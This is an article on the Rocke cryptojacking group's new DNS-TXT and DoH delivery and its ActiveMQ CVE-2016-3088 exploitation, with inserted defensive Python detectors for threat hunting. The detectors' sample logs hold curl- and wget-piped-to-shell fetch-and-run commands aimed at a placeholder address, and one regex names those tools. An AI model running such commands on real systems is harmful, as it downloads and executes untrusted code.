The Chinese-speaking cybercrime group Rocke, believed to be behind several large-scale cryptomining campaigns in the past, has adopted new Tactics, Techniques, and Procedures (TTPs), including new C2 infrastructure and updated malware, to evade detection.
The first reports on the group's illicit cryptomining operations emerged in August 2018, when Rocke compromised unpatched Apache Struts, Oracle WebLogic, and Adobe ColdFusion servers and installed cryptomining malware on them. Earlier this year, researchers from Palo Alto Networks' Unit 42 found new cryptojacking samples that uninstall the cloud security and monitoring agents of Tencent Cloud and Alibaba Cloud from infected Linux servers. In March the group was using a dropper dubbed LSD that fetched its instructions from Pastebin; this summer it moved its Command and Control (C2) infrastructure away from Pastebin to self-hosted servers, according to researchers from the cybersecurity firm Anomali.
“In September 2019, the actor moved away from hosting the scripts on dedicated servers and instead started to use Domain Name System (DNS) text records. These records are accessed via normal DNS queries or DNS-over-HTTPS (DoH) if the DNS query fails,” the experts said. Self-hosted servers and DNS records make the group's operations both harder to detect and harder to take down, they added.
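The delivery chain described above (script in a TXT record, fetched over plain DNS first and over DoH when that fails) leaves two observable traces on the network. The following Python is an added example written for this article, not code from the article or from the Anomali research: it scans constructed, Zeek-style dns.log and http.log lines and flags hosts whose TXT answers look like shell scripts and that also reach a DoH endpoint. The column layout, the length threshold, the token list, the DoH host list and the log lines themselves are assumptions made for illustration.

```python
import base64
import binascii
import re
from collections import defaultdict

# Assumed: TXT answers at least this long, or containing these tokens
# (directly or after base64 decoding), are treated as script delivery.
TXT_LEN_THRESHOLD = 120
SCRIPT_TOKENS = re.compile(
    r"(curl |wget |/bin/sh|bash -c|base64 -d|chmod \+x|\| ?(sh|bash)\b)", re.I)
BENIGN_PREFIXES = ("v=spf1", "v=DKIM1", "google-site-verification=")

# Assumed list of public DoH resolvers; extend with what your egress allows.
DOH_HOSTS = {"dns.google", "cloudflare-dns.com", "dns.quad9.net"}
DOH_PATH = re.compile(r"^/(dns-query|resolve)(\?|$)")


def looks_like_script(txt: str) -> bool:
    """Heuristic: does this TXT answer carry a script rather than SPF/DKIM?"""
    if txt.startswith(BENIGN_PREFIXES):
        return False
    if SCRIPT_TOKENS.search(txt):
        return True
    # Payloads are often base64-encoded into the record; decode and re-check.
    try:
        decoded = base64.b64decode(txt, validate=True).decode("utf-8", "replace")
        if SCRIPT_TOKENS.search(decoded):
            return True
    except (binascii.Error, ValueError):
        pass
    return len(txt) >= TXT_LEN_THRESHOLD


def is_doh(host: str, uri: str, content_type: str) -> bool:
    """RFC 8484 DoH uses /dns-query with application/dns-message; Google and
    Cloudflare also expose a JSON API (/resolve, application/dns-json)."""
    return (host in DOH_HOSTS
            or bool(DOH_PATH.match(uri))
            or content_type.startswith("application/dns-"))


def parse_tsv(lines, ncols):
    """Yield tab-separated records, skipping comment and blank lines."""
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.rstrip("\n").split("\t")
        if len(fields) == ncols:
            yield fields


def hunt(dns_lines, http_lines):
    """Return {src_ip: [evidence, ...]} for TXT-script and DoH observations."""
    findings = defaultdict(list)
    # Assumed dns.log columns: ts, src, query, qtype, answers (comma-joined)
    for _ts, src, query, qtype, answers in parse_tsv(dns_lines, 5):
        if qtype != "TXT" or answers == "-":
            continue
        for answer in answers.split(","):
            if looks_like_script(answer):
                findings[src].append(f"txt-script:{query}")
    # Assumed http.log columns: ts, src, host, method, uri, response content-type
    for _ts, src, host, _method, uri, ctype in parse_tsv(http_lines, 6):
        if is_doh(host, uri, ctype):
            findings[src].append(f"doh:{host}{uri}")
    return dict(findings)


def classify(findings):
    """high = script over TXT *and* DoH from the same host; medium = one of them."""
    out = {}
    for src, evidence in findings.items():
        kinds = {e.split(":", 1)[0] for e in evidence}
        out[src] = "high" if kinds == {"txt-script", "doh"} else "medium"
    return out


# Constructed sample logs (TEST-NET addresses and reserved .test names).
PAYLOAD_B64 = base64.b64encode(b"wget -q -O- http://203.0.113.5/x.sh | bash").decode()
DNS_LOG = [
    "#fields\tts\tsrc\tquery\tqtype\tanswers",
    "1569850000.1\t10.0.0.5\tupdate.example.test\tTXT\tcurl -fsSL http://203.0.113.5/a.sh | sh",
    "1569850001.2\t10.0.0.7\texample.com\tTXT\tv=spf1 include:_spf.example.com ~all",
    f"1569850002.3\t10.0.0.5\tcfg.example.test\tTXT\t{PAYLOAD_B64}",
    "1569850003.0\t10.0.0.9\texample.com\tA\t93.184.216.34",
]
HTTP_LOG = [
    "1569850004.0\t10.0.0.5\tdns.google\tGET\t/resolve?name=update.example.test&type=TXT\tapplication/dns-json",
    "1569850005.0\t10.0.0.7\twww.example.com\tGET\t/\ttext/html",
    "1569850006.0\t10.0.0.11\tcloudflare-dns.com\tPOST\t/dns-query\tapplication/dns-message",
]

if __name__ == "__main__":
    for src, sev in classify(hunt(DNS_LOG, HTTP_LOG)).items():
        print(src, sev)
```

The DoH leg is the more durable signal: TXT lookups can be hidden by pointing the loader at an external resolver, but DoH traffic to a well-known resolver from a server that has no reason to use it is worth an alert on its own, which is why a host with only that evidence is still rated medium here.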
In previous campaigns Rocke was observed exploiting CVE-2019-3396 in Atlassian Confluence servers to gain remote code execution and deliver its miners; more recently the attackers added functionality to LSD to exploit Apache ActiveMQ servers vulnerable to CVE-2016-3088. CVE-2016-3088 is an arbitrary file upload vulnerability in the Fileserver web application of ActiveMQ 5.x before 5.14.0, reachable through an HTTP PUT request.
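A practical check for the ActiveMQ leg of this campaign is to look for write-type requests against the Fileserver webapp in the broker's HTTP access log. The following Python is an added example written for this article, not code from the article or from the Anomali research. It relies on the published CVE-2016-3088 description, in which the attacker uploads with HTTP PUT and then relocates the file with HTTP MOVE; neither method is ever normal browser traffic to /fileserver/, so both are flagged, and a PUT followed by a successful MOVE from the same source is called out as the exploit's shape. The NCSA-style log lines and the addresses are constructed for illustration.

```python
import re
from collections import defaultdict

# Combined/NCSA access-log line: src ident user [ts] "METHOD path proto" status size
ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
WRITE_METHODS = {"PUT", "MOVE"}
FILESERVER_PREFIX = "/fileserver/"


def parse_access_line(line):
    """Return (src, method, path, status), or None if the line doesn't parse."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    return m["src"], m["method"], m["path"], int(m["status"])


def fileserver_writes(lines):
    """Group PUT/MOVE requests under /fileserver/ by source address.
    Non-2xx attempts are kept too: a 404 still shows someone probing."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_access_line(line)
        if rec is None:
            continue
        src, method, path, status = rec
        if method in WRITE_METHODS and path.startswith(FILESERVER_PREFIX):
            hits[src].append((method, path, status))
    return dict(hits)


def upload_then_move(hits):
    """Sources with a successful PUT followed later by a successful MOVE."""
    suspects = {}
    for src, reqs in hits.items():
        ok = [m for m, _p, s in reqs if 200 <= s < 300]
        if "PUT" in ok and "MOVE" in ok[ok.index("PUT"):]:
            suspects[src] = reqs
    return suspects


# Constructed sample log: one full upload-then-move sequence from 203.0.113.10,
# a benign directory listing and a failed (patched or denied) PUT from 198.51.100.7.
ACCESS_LOG = [
    '203.0.113.10 - - [02/Oct/2019:10:00:00 +0000] "PUT /fileserver/s.txt HTTP/1.1" 204 0',
    '203.0.113.10 - - [02/Oct/2019:10:00:01 +0000] "MOVE /fileserver/s.txt HTTP/1.1" 204 0',
    '198.51.100.7 - - [02/Oct/2019:10:00:03 +0000] "GET /fileserver/ HTTP/1.1" 200 1201',
    '198.51.100.7 - - [02/Oct/2019:10:00:04 +0000] "PUT /fileserver/t.txt HTTP/1.1" 404 0',
    'garbage line',
]

if __name__ == "__main__":
    writes = fileserver_writes(ACCESS_LOG)
    for src, reqs in writes.items():
        print(src, reqs)
    print("upload-then-move:", list(upload_then_move(writes)))
```

On a broker that is not yet patched, the longer-term fix is to remove or disable the Fileserver webapp entirely rather than to rely on this log check; the check remains useful afterwards to spot scanners still looking for it.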
To ensure that only its own cryptominer runs on an infected host, the group's malware terminates other processes with high CPU usage. LSD recognises its own miner by the MD5 hash of the binary so that it does not kill it along with competing miners.
“Rocke keeps evolving its TTPs in attempts to remain undetected. By moving away from hosting scripts on Pastebin to self-hosted and DNS records, the threat actor is more protected against potential take-downs that could prevent ongoing malicious activity. It is expected that the group will continue to exploit more vulnerabilities to mine additional cryptocurrencies in the near future,” the researchers concluded.
Additional details about Rocke's activity, including Indicators of Compromise (IoCs), are available in the Anomali blog post.